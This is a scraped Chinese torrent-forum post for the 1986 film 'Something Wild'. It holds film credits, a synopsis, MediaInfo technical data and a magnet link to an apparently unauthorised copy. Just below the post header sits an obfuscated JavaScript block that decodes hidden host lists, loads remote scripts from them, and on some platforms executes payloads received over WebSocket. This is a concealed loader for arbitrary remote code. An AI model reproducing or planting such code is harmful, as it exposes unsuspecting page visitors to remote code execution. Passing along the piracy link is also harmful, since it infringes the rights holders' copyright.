散弹露露[中文字幕]Something.Wild.1986.1080p.BluRay.x264.DTS.2.0-迅雷下载 13.15GB

版主小s 6天前 346

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 散弹露露 / 艳遇 / 野性的邂逅(港)

◎片 名 Something Wild

◎年 代 1986

◎产 地 美国

◎类 别 剧情 / 喜剧 / 犯罪

◎语 言 英语

◎上映日期 1986-11-07(美国)

◎IMDb链接 https://www.imdb.com/title/tt0091983/

◎豆瓣评分 7.4/10 (1394人评价)

◎豆瓣链接 https://movie.douban.com/subject/1301827/

◎片 长 113分钟

◎导 演 乔纳森·戴米 Jonathan Demme (id:1032064)

◎编 剧 E·马克斯·弗莱 E. Max Frye (id:1323059)

◎演 员 杰夫·丹尼尔斯 Jeff Daniels (id:1006974)

梅兰尼·格里菲斯 Melanie Griffith (id:1025204)

雷·利奥塔 Ray Liotta (id:1036326)

莱布·兰斯基 Leib Lensky (id:1118793)

崔西·沃特 Tracey Walter (id:1164847)

罗伯特·雷吉利 Robert Ridgely (id:1016737)

爱德华·萨克森 Edward Saxon (id:1296791)

狗狗马克思 Max the Dog (id:1440695)

巴兹·基尔曼 Buzz Kilman (id:1114098)

肯尼思·厄特 Kenneth Utt (id:1010139)

玛格丽特·柯林 Margaret Colin (id:1018028)

约翰·塞尔斯 John Sayles (id:1027929)

查尔斯·纳佩尔 Charles Napier (id:1002794)

阿德尔·卢茨 Adelle Lutz (id:1041463)

加里·高兹曼 Gary Goetzman (id:1041545)

约翰·沃特斯 John Waters (id:1048178)

安娜·莱文 Anna Levine (id:1049843)

Patricia Falkenhain Patricia Falkenhain (id:1081214)

'Sister' Carol East 'Sister' Carol East (id:1085772)

Drummond Erskine Drummond Erskine (id:1086057)

Dorothy Demme Dorothy Demme (id:1087548)

杰克·吉尔平 Jack Gilpin (id:1101385)

比尔·米勒 Bill Miller (id:1292071)

罗纳德·M·博兹曼 Ronald M. Bozman (id:1279124)

乔纳森·戴米 Jonathan Demme (id:1032064)

肯尼思·厄特 Kenneth Utt (id:1010139)

爱德华·萨克森 Edward Saxon (id:1296791)

约翰·凯尔 John Cale (id:1032670)

劳瑞·安德森 Laurie Anderson (id:1018622)

塔克·藤本 Tak Fujimoto (id:1009829)

克雷格·麦凯 Craig McKay (id:1291636)

比利·霍普金斯 Billy Hopkins (id:1054463)

里萨·布雷蒙·加西亚 Risa Bramon Garcia (id:1284503)

Stephen J. Lineweaver Stephen J. Lineweaver (id:1290086)

Norma Moriceau Norma Moriceau (id:1292511)

艾兰·丹格里奥 Alan D'Angerio (id:1281682)

大卫·萨迪 David Sardi (id:1296704)

罗纳德·M·博兹曼 Ronald M. Bozman (id:1279124)

Kyle McCarthy Kyle McCarthy (id:1291459)

Dana J. Kuznetzkoff Dana J. Kuznetzkoff (id:1289146)

◎标 签 美国 / 公路 / 喜剧 / 美国电影 / 爱情 / 1980s / CC / 1986

◎简 介

杰夫·丹尼尔斯在片中饰演个性保守的雅痞行政人员,偶然到餐厅吃午饭,碰到狂野女郎梅拉尼·格里菲思。她把他带到汽车旅馆展开激情游戏,令他大感意外。然而接下来的一段放荡不羁的刺激遭遇,更是令他惊喜交集,整个改变了他的人生。

  1. General

  2. Unique ID : 72315583266491245740365168030953839953 (0x36677987A291B4E4B866A16437851D51)

  3. Complete name : [email protected]kv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.2 GiB

  7. Duration : 1 h 53 min

  8. Overall bit rate : 16.5 Mb/s

  9. Encoded date : UTC 2021-07-20 01:20:02

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 53 min

  22. Bit rate : 15.0 Mb/s

  23. Width : 1 920 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.301

  33. Stream size : 11.9 GiB (91%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=6 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=20.3000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 53 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : Lt Rt

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.20 GiB (9%)

  54. Title : eng

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 50 min

  65. Bit rate : 22.0 kb/s

  66. Count of elements : 2607

  67. Stream size : 17.4 MiB (0%)

  68. Title : chs

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No


  72. Text #2

  73. ID : 4

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 50 min

  79. Bit rate : 22.2 kb/s

  80. Count of elements : 2607

  81. Stream size : 17.6 MiB (0%)

  82. Title : cht

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 51 min

  93. Bit rate : 56.3 kb/s

  94. Count of elements : 3758

  95. Stream size : 44.7 MiB (0%)

  96. Title : eng

  97. Language : English

  98. Default : No

  99. Forced : No


  100. Menu

  101. 00:00:00.000 : 第 01 章

  102. 00:03:13.610 : 第 02 章

  103. 00:08:01.230 : 第 03 章

  104. 00:09:31.654 : 第 04 章

  105. 00:12:30.541 : 第 05 章

  106. 00:19:10.691 : 第 06 章

  107. 00:20:42.282 : 第 07 章

  108. 00:24:07.070 : 第 08 章

  109. 00:27:41.409 : 第 09 章

  110. 00:30:54.060 : 第 10 章

  111. 00:32:50.343 : 第 11 章

  112. 00:35:40.179 : 第 12 章

  113. 00:38:35.396 : 第 13 章

  114. 00:45:03.534 : 第 14 章

  115. 00:48:39.708 : 第 15 章

  116. 00:50:43.582 : 第 16 章

  117. 00:53:01.219 : 第 17 章

  118. 00:55:09.431 : 第 18 章

  119. 01:01:04.744 : 第 19 章

  120. 01:04:28.948 : 第 20 章

  121. 01:11:29.868 : 第 21 章

  122. 01:15:55.175 : 第 22 章

  123. 01:21:03.525 : 第 23 章

  124. 01:27:13.686 : 第 24 章

  125. 01:33:33.983 : 第 25 章

  126. 01:42:11.583 : 第 26 章

  127. 01:48:04.060 : 第 27 章


TAGS 剧情 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:E0BC0841E277235857491AEB11906ADAA15657B4
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回